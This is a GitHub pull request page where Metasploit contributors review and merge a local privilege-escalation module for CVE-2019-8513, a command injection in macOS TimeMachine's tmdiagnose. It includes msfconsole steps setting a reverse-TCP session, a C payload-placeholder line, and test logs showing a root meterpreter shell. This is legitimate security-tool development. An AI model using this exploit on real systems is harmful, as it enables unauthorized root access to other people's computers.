Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit for CVE-2019-8513 (TimeMachine cmd injection) #11726

Merged
merged 12 commits into from Jun 29, 2019

Conversation

Projects
None yet
4 participants
@timwr
Copy link
Contributor

commented Apr 14, 2019

Initial commit of CVE-2019-8513. Ping @ChiChou

Verification

  • Start msfconsole
  • Get a (user) session on OSX < 10.14.4
  • Run the module:
use exploit/osx/local/timemachine_cmd_injection 
set SESSION -1
set LHOST <tab>
set LPORT 4445
exploit 
  • Verify you get a new session as root
  • Document the thing and how it works
@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Apr 14, 2019

  1. Currently there is an issue with cmd_exec when using osx/x64/meterpreter/reverse_tcp, which causes the exploit not to work on that session type. python meterpreter is working however.
  2. The exploit cleanup ejects all drives (so any thumb drives you have attached will be ejected), maybe @ChiChou can help fix this. We know the drive label so it shouldn't be too hard to look that up and eject only that drive.

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from 54bd9f5 to 0472f96 Apr 16, 2019

Show resolved Hide resolved modules/exploits/osx/local/timemachine_cmd_injection.rb Outdated

def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X TimeMachine Command Injection Privilege Escalation',

This comment has been minimized.

Copy link
@bcoles

bcoles Apr 17, 2019

Contributor

I'd like to think this won't be the last command injection LPE in TimeMachine. Perhaps mention tmdiagnose in the title, or something else unique and more applicable.

bcoles and others added some commits Apr 17, 2019

Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from 1895bcd to 1a2a85b Apr 21, 2019

Show resolved Hide resolved documentation/modules/exploit/osx/local/timemachine_cmd_injection.md Outdated
Show resolved Hide resolved modules/exploits/osx/local/timemachine_cmd_injection.rb Outdated
Show resolved Hide resolved modules/exploits/osx/local/timemachine_cmd_injection.rb Outdated
Show resolved Hide resolved modules/exploits/osx/local/timemachine_cmd_injection.rb Outdated

#include <sys/mman.h>

char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";

This comment has been minimized.

Copy link
@bcoles

bcoles Apr 21, 2019

Contributor

This approach is likely problematic in the unlikely event that the payload is larger than 1024. If it is in fact problematic, then it may be difficult to debug, as the cause won't be immediately obvious, due to clobbering adjacent binary data.

This also results in the payload being written to disk, rather than writing the exploit to disk and executing the payload in memory.

Potential alternatives:

  • adjusting the exploit to accept a command line argument to execute; or
  • adjusting the exploit to spawn a setuid(0,0,0) shell, if feasible, and piping the payload as input through STDIN; or
  • lazy option: adding a warning/error to the exploit method in the event that the generated payload is larger than 1024.

This comment has been minimized.

Copy link
@timwr

timwr Apr 21, 2019

Author Contributor

It's actually tmdiagnose that calls back and executes our payload (without any arguments) so there is no way to avoid having some kind of payload on disk. (Unless you can think of a way?).
I'll see if I can pipe the python/command payload through stdin and also add a length check.

This comment has been minimized.

Copy link
@bcoles

bcoles Apr 21, 2019

Contributor

:shrug: I haven't looked at how the exploit works at all. A closer look reveals the x64 payload obviously can't be piped, unless it's already written to disk, which is less preferable.

Simply adding a length check might be the easiest way.

bcoles and others added some commits Apr 21, 2019

Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>
Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from 4ca1289 to c12c597 Apr 22, 2019

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from c12c597 to f3f044e Apr 26, 2019

@timwr timwr referenced this pull request May 6, 2019

Merged

Add CVE-2019-8565 OSX Feedback Assistant local root exploit #11818

5 of 5 tasks complete
@busterb

This comment has been minimized.

Copy link
Member

commented Jun 29, 2019

If you can rebase on master, the Travis issues in this PR are resolved upstream.

@busterb

This comment has been minimized.

Copy link
Member

commented Jun 29, 2019

Been testing a few versions. 10.11.6 appeared vulnerable but not work:

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Uploading file: '/tmp/.auprhsjdiuv'
[*] Executing exploit '/tmp/.auprhsjdiuv'
[*] Exploit result:
2019-06-29 02:19:08.738 .auprhsjdiuv[483:17255] creating dmg image
2019-06-29 02:19:12.838 .auprhsjdiuv[483:17255] mounting malformed disk
2019-06-29 02:19:14.126 .auprhsjdiuv[483:17255] sending XPC msg
2019-06-29 02:19:14.127 .auprhsjdiuv[483:17255] now wait a few minutes for the root command to run
[*] Exploit completed, but no session was created.

10.13.3 worked great:

meterpreter > sysinfo
Computer     : vagrants-MacBook-Pro.local
OS           : macOS High Sierra (macOS 10.13.3)
Architecture : x86
BuildTuple   : 
Meterpreter  : x64/osx
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

Mojave worked fine too.

@busterb busterb changed the title Initial commit of CVE-2019-8513 (TimeMachine cmd injection) Add exploit for CVE-2019-8513 (TimeMachine cmd injection) Jun 29, 2019

@busterb busterb self-assigned this Jun 29, 2019

@busterb busterb merged commit d20801c into rapid7:master Jun 29, 2019

2 of 3 checks passed

continuous-integration/travis-ci/pr The Travis CI build failed
Details
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

busterb added a commit that referenced this pull request Jun 29, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented Jun 29, 2019

Release Notes

This adds a module exploiting a command injection in TimeMachine on macOS <= 10.14.3 in order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers from a command injection vulnerability that can be exploited by creating a specially crafted disk label.

msjenkins-r7 added a commit that referenced this pull request Jun 29, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented Jun 29, 2019

Thanks @timwr @bcoles and @ChiChou

@ChiChou

This comment has been minimized.

Copy link

commented Jun 30, 2019

Been testing a few versions. 10.11.6 appeared vulnerable but not work:

10.11.6 is not vulnerable. It only works from Sierra (10.12.x) - Mojave (10.14.3)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.